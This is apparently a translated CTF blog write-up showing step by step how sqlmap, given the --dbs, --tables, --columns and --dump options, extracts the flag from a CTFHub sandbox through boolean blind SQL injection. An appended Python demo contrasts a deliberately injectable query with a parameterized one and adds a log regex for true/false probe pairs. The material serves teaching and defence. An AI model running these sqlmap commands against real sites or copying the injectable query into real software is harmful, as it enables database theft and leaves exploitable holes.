Boolean blind injection of sqlmap blasting

I haven't updated for a long time, and had almost forgotten this challenge. As a rookie, I finally understood this question and the meaning of some of the commands, and I will explain it in as detailed and understandable a way as possible.

sqlmap blasting (first you have to download sqlmap; a copy happens to be available on CSDN)

Basic command: python sqlmap.py -u "XXXXX" --batch is the skeleton that every injection command below builds on (--batch answers sqlmap's prompts with the defaults so it runs unattended).

1. The library name of the blasting database

Input: python sqlmap.py -u "http://challenge-cb6615ef28a95b3d.sandbox.ctfhub.com:10080/?id=1" --batch --dbs
Result: (screenshot of sqlmap output)

python sqlmap.py -u "XXX" --batch is the basic structure: the URL given to -u is the injectable target whose data is to be blasted (here the id parameter), and --dbs tells sqlmap to enumerate the databases.

The screenshot shows the databases that were found.

2. Blasting the name of the table in the current database
Input: python sqlmap.py -u "http://challenge-8400f0508f0ba587.sandbox.ctfhub.com:10080/?id=1" --batch -D "sqli" --tables
Here -D selects the database, and --tables enumerates the table names in it.
Result: (screenshot of sqlmap output)

Two table names are obtained: flag and news.
3. Blasting column name
Input: python sqlmap.py -u "http://challenge-8400f0508f0ba587.sandbox.ctfhub.com:10080/?id=1" --batch -D "sqli" -T "flag" --columns
-T selects the table, and --columns enumerates its column names.
Result: (screenshot of sqlmap output)

The column type obtained is varchar (VARCHAR(M) is a more flexible data type than CHAR: it also holds character data, but stores a variable-length string). It is variable-length here because the flag in ctfhub is different every time, and since the flag is a character string it is stored as varchar.

4. Blast the data
Input: python sqlmap.py -u "http://challenge-8400f0508f0ba587.sandbox.ctfhub.com:10080/?id=1" --batch -D "sqli" -T "flag" -C "flag" --dump
-C selects the column, and --dump exports the data in it.
Result: (screenshot of sqlmap output)

Successfully obtained the flag.
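As an added example that is not part of the original post, the following Python script shows what sqlmap's boolean-based blind test relies on and how to close the hole: a query that pastes the id parameter into the SQL text beside a parameterized one, plus a small access-log check for the true/false probe pairs. The news table, its rows and the log lines are constructed for the demo and are not the challenge's own.

```python
import re
import sqlite3
from urllib.parse import unquote


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge database (its schema is not
    shown on the page, so this table and its rows are assumptions)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)", [(1, "hello"), (2, "world")])
    return con


def lookup_vulnerable(con: sqlite3.Connection, user_id: str) -> list:
    """The ?id= value is pasted into the SQL text, so "1 AND 1=2" rewrites the
    WHERE clause and the page content reveals whether the condition held."""
    return con.execute(f"SELECT title FROM news WHERE id = {user_id}").fetchall()


def lookup_safe(con: sqlite3.Connection, user_id: str) -> list:
    """Parameterized query: the value is bound as data and never parsed as SQL,
    so "1 AND 1=1" is just a string that matches no id."""
    return con.execute("SELECT title FROM news WHERE id = ?", (user_id,)).fetchall()


def has_boolean_oracle(lookup, con: sqlite3.Connection) -> bool:
    """sqlmap's opening test for boolean-based blind injection: do a true and a
    false condition produce different responses?"""
    return lookup(con, "1 AND 1=1") != lookup(con, "1 AND 1=2")


# Log-side check: a decoded query string carrying an AND/OR comparison.
PROBE = re.compile(r"(?i)\b(?:and|or)\b\s+[^\s&]+\s*=\s*[^\s&]+")


def flag_probe_lines(lines: list) -> list:
    """Return the access-log lines whose URL-decoded request looks like a
    boolean probe; lines that only differ by 1=1 vs 1=2 are the classic pair."""
    return [ln for ln in lines if PROBE.search(unquote(ln))]


SAMPLE_LOG = [  # constructed sample lines, not from the page
    'GET /?id=1 HTTP/1.1" 200',
    'GET /?id=1%20AND%201=1 HTTP/1.1" 200',
    'GET /?id=1%20AND%201=2 HTTP/1.1" 200',
    'GET /?id=2 HTTP/1.1" 200',
]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable oracle:", has_boolean_oracle(lookup_vulnerable, db))  # True
    print("parameterized oracle:", has_boolean_oracle(lookup_safe, db))  # False
    print("flagged:", flag_probe_lines(SAMPLE_LOG))
```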

If you are not yet familiar with sqlmap, you can practise with it on the integer-type and character-type SQL injection challenges as well.
You can also learn manual injection, but it is somewhat more troublesome.

Source: blog.csdn.net/m0_52699073/article/details/113063496